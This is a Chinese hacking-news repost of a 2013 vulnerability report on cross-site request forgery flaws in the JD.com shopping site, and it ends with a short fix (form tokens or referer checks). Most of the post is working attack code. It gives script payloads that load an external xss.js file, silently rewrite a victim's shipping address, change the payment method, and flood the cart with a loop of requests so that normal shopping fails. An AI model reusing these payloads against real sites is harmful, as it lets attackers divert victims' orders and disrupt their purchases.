记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

京东商城多处敏感操作缺乏验证

2013-07-15 11:15
多处 CSRF,能修改的内容很多

1. 修改收货地址,帐户中只有一个收货地址时,很多人付款时不注意收货地址,直接付款
 
 
<script src= http://mmme.me/xss.js></script>
xss.ajax('http://trade.jd.com/consignee/saveConsignee.action',
"consigneeParam.id=0&consigneeParam.type=1&consigneeParam.name=xxxkkk&consigneeParam.provinceId=15&consigneeParam.cityId=1158&consigneeParam.countyId=3413&consigneeParam.townId=46422&consigneeParam.address=bbbbbbbbbbbb&consigneeParam.mobile=13100000000&consigneeParam.email=&consigneeParam.phone=&consigneeParam.provinceName=浙江&consigneeParam.cityName=宁波市&consigneeParam.countyName=江东区&consigneeParam.townName=白鹤街道&consigneeParam.commonConsigneeSize=1&consigneeParam.isUpdateCommonAddress=1"
)
</script>
 
效果如下
 
 
2. 修改支付方式,这个没多大影响
 
修改支付方式为 货到付款,工作日、双休日与假日均可送货
 
 
<script src= http://mmme.me/xss.js></script>
xss.ajax('http://trade.jd.com/payAndShip/savePayAndShip.action', 'saveParam.paymentId=1&saveParam.jdShipmentType=65&saveParam.jdShipTime=3&saveParam.jdBeforeNotify=0&saveParam.jdPayWayId=1'
)
</script>
 
 
 
3. 购物车 CSRF 拒绝服务,CSRF 填满购物车,正常购物流程无法进行
 
 
(
ddos = function() {
  var i;
  for (i = 530000; i <= 532000; i++) {
    xss.csrf('http://gate.jd.com/InitCart.aspx?pcount=100000000&ptype=1&pid=' + i);
  }
}
).call(this);
 
效果如下,
 
 
正常购物再无法加入购物车
 
 
 


修复方案:

表单加 token 或验证 referer 
 

知识来源: www.2cto.com/Article/201307/227798.html

阅读:90945 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“京东商城多处敏感操作缺乏验证”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云

本页关键词